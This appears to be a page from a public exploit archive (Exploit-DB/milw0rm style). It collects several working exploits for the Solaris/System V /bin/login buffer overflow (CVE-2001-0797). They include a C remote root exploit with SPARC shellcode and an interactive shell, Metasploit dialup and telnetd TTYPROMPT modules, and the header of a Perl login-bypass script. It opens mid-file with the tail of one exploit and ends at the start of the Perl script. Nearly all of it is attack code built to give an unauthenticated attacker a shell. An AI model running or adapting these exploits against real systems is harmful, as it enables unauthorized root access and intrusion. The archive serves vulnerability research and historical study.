  strcpy(str_buffer + str_buffer_pos,exec_argv2);
  str_buffer_pos    += strlen(exec_argv2)+1;
  
  strcpy(str_buffer + str_buffer_pos,exec_argv3);
  str_buffer_pos    += strlen(exec_argv3)+1;
  
  memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end));
  str_buffer_pos += strlen(str_end);
  
  {
    char buf[100];
    fgets(buf,100,stdin);
  }
  printf("sending login!\n");
  fflush(stdout);
  send_data(sock,str_buffer,str_buffer_pos);
  send_data(sock,NULL,0);
  printf("\n\n\npress return to send password\n...");
  
  {
    char buf[100];
    fgets(buf,100,stdin);
  }
  send_data(sock,str_buffer,strlen(str_buffer)+1);
  printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
  fflush(stdout);
  sleep(30);
  return 42;
}


// milw0rm.com [2001-12-20]
		

- Vulnerability information (716)

Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC) (EDBID:716)
solaris remote
2004-12-24 Verified
513 Marco Ivaldi
N/A [click to download]
/*
 * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Buffer overflow in login in various System V based operating systems 
 * allows remote attackers to execute arbitrary commands via a large number 
 * of arguments through services such as telnet and rlogin (CVE-2001-0797).
 *
 * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
 *
 * This remote root exploit uses the (old) System V based /bin/login 
 * vulnerability via the rlogin attack vector, returning into the .bss 
 * section to effectively bypass the non-executable stack protection
 * (noexec_user_stack=1 in /etc/system).
 *
 * Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
 * technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
 *
 * Usage (must be root):
 * # gcc raptor_rlogin.c -o raptor_rlogin -Wall
 * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
 * # ./raptor_rlogin -h 192.168.0.50
 * [...]
 * # id;uname -a;uptime;
 * uid=0(root) gid=0(root)
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 *   7:45pm  up 12 day(s), 18:42,  1 user,  load average: 0.00, 0.00, 0.01
 * #
 *
 * Vulnerable platforms (SPARC):
 * Solaris 2.5.1 without patch 106160-02 [untested]
 * Solaris 2.6 without patch 105665-04 [untested]
 * Solaris 7 without patch 112300-01 [untested]
 * Solaris 8 without patch 111085-02 [tested]
 */

#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define	INFO1	"raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define	INFO2	"Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BUFSIZE	3000			// max size of the evil buffer
#define	RETADDR	0x27184			// retaddr, should be reliable
#define	TIMEOUT	10			// net_read() default timeout
#define	CMD	"id;uname -a;uptime;\n"	// executed upon exploitation

char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";

char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";

/* prototypes */
int	exploit_addchar(unsigned char *ww, unsigned char wc);
void	fatalerr(char *func, char *error, int fd);
int	net_connect(char *host, int port, int timeout);
int	net_read(int fd, char *buf, int size, int timeout);
int	net_resolve(char *host);
int	sc_copy(unsigned char *buf, char *str, long len);
void	set_val(char *buf, int pos, int val);
void	shell(int fd);
void	usage(char *progname);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
		case 'h':
			host = optarg;
			break;
		case 't':
			timeout = atoi(optarg);
			break;
		case 'd':
			debug = 1;
			break;
		default:
			usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);		// local login name
	p += 4;
	memcpy(p, "bar", 3);		// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));	// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");
	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# waiting for login prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);	// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;
	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");
	
	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

/*
 * exploit_addchar(): char translation for pam (ripped from scut)
 */
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
	unsigned char * wwo = ww;

	switch (wc) {
	case ('\\'):
		*ww++ = '\\';
		*ww++ = '\\';
		break;
	case (0xff):
	case ('\n'):
	case (' '):
	case ('\t'):
		*ww++ = '\\';
		*ww++ = ((wc & 0300) >> 6) + '0';
		*ww++ = ((wc & 0070) >> 3) + '0';
		*ww++ = (wc & 0007) + '0';
		break;
	default:
		*ww++ = wc;
		break;
	}

	return (ww - wwo);
}

/*
 * fatalerr(): error handling routine
 */
void fatalerr(char *func, char *error, int fd)
{
	fprintf(stderr, "%s: %s\n", func, error);
	close(fd);
	exit(1);
}

/*
 * net_connect(): simple network connect with timeout
 */
int net_connect(char *host, int port, int timeout)
{
	int			fd, i, flags, sock_len;
	struct sockaddr_in	sin;
	struct timeval		tv;
	fd_set			fds;

	/* allocate a socket */
	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	/* bind a privileged port (FIXME) */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	for (i = 1023; i > 0; i--) {
		sin.sin_port = htons(i);
		if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
			break;
	}
	if (i == 0)
		fatalerr("error", "Can't bind a privileged port (must be root)", fd);

	/* resolve the peer address */
	sin.sin_port = htons(port);
	if (!(sin.sin_addr.s_addr = net_resolve(host)))
		fatalerr("error", "Can't resolve hostname", fd);

	/* set non-blocking */
	if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	/* connect to remote host */
	if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
		if (fcntl(fd, F_SETFL, flags) < 0)
			fatalerr("fcntl", strerror(errno), fd);
		return(fd);
	}
	if (errno != EINPROGRESS)
		fatalerr("error", "Can't connect to remote host", fd);

	/* set timeout */
	tv.tv_sec = timeout;
	tv.tv_usec = 0;

	/* setup select structs */
	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select */
	if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
		fatalerr("error", "Can't connect to remote host", fd);
	
	/* check if connected */
	sock_len = sizeof(sin);
	if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
		fatalerr("error", "Can't connect to remote host", fd);
	if (fcntl(fd, F_SETFL, flags) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	return(fd);
}

/*
 * net_read(): non-blocking read from fd
 */
int net_read(int fd, char *buf, int size, int timeout)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = timeout;
	wait.tv_usec = 0;

	memset(buf, 0, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}

/*
 * net_resolve(): simple network resolver
 */
int net_resolve(char *host)
{
	struct in_addr	addr;
	struct hostent	*he;

	memset(&addr, 0, sizeof(addr));

	if ((addr.s_addr = inet_addr(host)) == INADDR_NONE) {
		if (!(he = (struct hostent *)gethostbyname(host)))
			return(0);
		memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
	}
	return(addr.s_addr);
}

/*
 * sc_copy(): copy the shellcode, using exploit_addchar()
 */
int sc_copy(unsigned char *buf, char *str, long len)
{
	unsigned char	*or = buf;
	int 		i;

	for(i = 0; i < len; i++)
		buf += exploit_addchar(buf, str[i]);

	return(buf - or);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote Hvar 2004 */
	fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) < 0) {
				perror("read");
				break;
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

void usage(char *progname)
{
	fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
	fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
	fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
	fprintf(stderr, "-d\t\tturn on debug mode\n\n");
	exit(1);
}

// milw0rm.com [2004-12-24]
		

- Vulnerability information (10036)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (EDBID:10036)
Platform: solaris (remote)
Published: 2001-12-12 (Verified)
Author: I)ruid
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
				This exploit connects to a system's modem over dialup and exploits
				a buffer overflow vulnerability in its System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
         'References'     =>
            [
               [ 'CVE', '2001-0797'],
               [ 'OSVDB', '690'],
               [ 'OSVDB', '691'],
               [ 'BID', '3681'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
            ],
			'Version'	=> '$Revision: 6479 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
         'Payload'        =>
            {
               'Space'       => 3000,
               'BadChars'    => '',
			   	'DisableNops' => true,
            },
         'Targets'        =>
            [
               ['Solaris 2.6 - 8 (SPARC)', {
						'Platform' => 'unix',
						'Ret'      => 0x00027184,
						# Solaris/SPARC special shellcode (courtesy of inode)
						# execve() + exit()
						'Shellcode' => 
							"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
							"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
							"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
							"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
						'NOP' => "\x90\x1b\x80\x0e",
					} ],

            ],
         'DefaultTarget' => 0
		))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class
		)

		deregister_options(
		)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			sleep 0.5
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match] 
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end	

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end
		

- Vulnerability information (16327)

Solaris in.telnetd TTYPROMPT Buffer Overflow (EDBID:16327)
Platform: solaris (remote)
Published: 2010-06-22 (Verified)
Author: metasploit
##
# $Id: ttyprompt.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
			'Description'    => %q{
				This module uses a buffer overflow in the Solaris 'login'
			application to bypass authentication in the telnet daemon.
			},
			'Author'         => [ 'MC', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'BID', '5531'],

				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					['Automatic', { }],
				],
			'DisclosureDate' => 'Jan 18 2002',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(23),
					OptString.new('USER', [ true, "The username to use",     "bin" ]),
				], self.class)
	end

	def exploit
		connect

		banner = sock.get_once

		print_status('Setting TTYPROMPT...')

		req =
			"\xff\xfc\x18" +
			"\xff\xfc\x1f" +
			"\xff\xfc\x21" +
			"\xff\xfc\x23" +
			"\xff\xfb\x22" +
			"\xff\xfc\x24" +
			"\xff\xfb\x27" +
			"\xff\xfb\x00" +
			"\xff\xfa\x27\x00" +
			"\x00TTYPROMPT" +
			"\x01" +
			rand_text_alphanumeric(6) +
			"\xff\xf0"

		sock.put(req)
		select(nil,nil,nil,0.25)

		print_status('Sending username...')

		filler = rand_text_alpha(rand(10) + 1)

		req << datastore['USER'] + (" #{filler}" * 65)

		sock.put(req + "\n\n\n")

		select(nil,nil,nil,0.25)
		sock.get_once

		sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

		select(nil,nil,nil,0.25)

		handler
	end

end

		

- Vulnerability information (16928)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (EDBID:16928)
Platform: linux (remote)
Published: 2010-07-03 (Verified)
Author: metasploit
##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
					This exploit connects to a system's modem over dialup and exploits
				a buffer overflow vulnerability in its System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'OSVDB', '691'],
					[ 'BID', '3681'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
				],
			'Version'	=> '$Revision: 9669 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
			'Payload'        =>
				{
					'Space'       => 3000,
					'BadChars'    => '',
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Solaris 2.6 - 8 (SPARC)',
						{
							'Platform' => 'unix',
							'Ret'      => 0x00027184,
							# Solaris/SPARC special shellcode (courtesy of inode)
							# execve() + exit()
							'Shellcode' =>
								"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
								"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
								"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
								"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
							'NOP' => "\x90\x1b\x80\x0e",
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 12 2001'))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			select(nil,nil,nil,0.5)
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end
		

- Vulnerability information (21179)

Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability (EDBID:21179)
Platform: solaris (remote)
Published: 2003-01-09 (Verified)
Author: snooq
source: http://www.securityfocus.com/bid/3681/info

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.

Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.

Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges. 

#!/usr/bin/perl
#
#  Date: 09/01/2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  I coded this script to demo how to login to a Solaris box without
#  password as 'bin'. Nothing new, it's an old bug which dates back 
#  to Dec 2001.
# 
#  And, there are already several versions of exploits circulating 
#  in the wild for at least a year now. 
#  
#  Due to uninformed/incompetent/ignorant sysadmins, there are still 
#  quite a number of vulnerable machines out there.
#  
#  'root' remote login is not allowed by default. So, unless, it's
#  a misconfigured box, you can only go as high as 'bin'. However,
#  once you are dropped into a shell, further privilege escalation is
#  very possible.
#
#  Background info
#  ===============
#  From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html
#
#  [quote]
#  The problem is there exists an authentication flag called the "fflag"
#  just after the array that gets overflowed in the .bss segment. This is
#  an array of char pointers, so when it is overflowed because of a
#  mismanagement of the indexing of this array, the fflag gets overwritten
#  with a valid address in the .bss segment. This is good enough to satisfy
#  the if(fflag) condition and spawn a shell.
#  [/quote]
#
#  For more info about this bug, go to:
#  http://www.cert.org/advisories/CA-2001-34.html
#
#  Disclaimer
#  ==========
#  This is meant for you to do a quick check on your systems only.
#  The author shall not be held responsible for any illegal use 
#  of this code. 
#
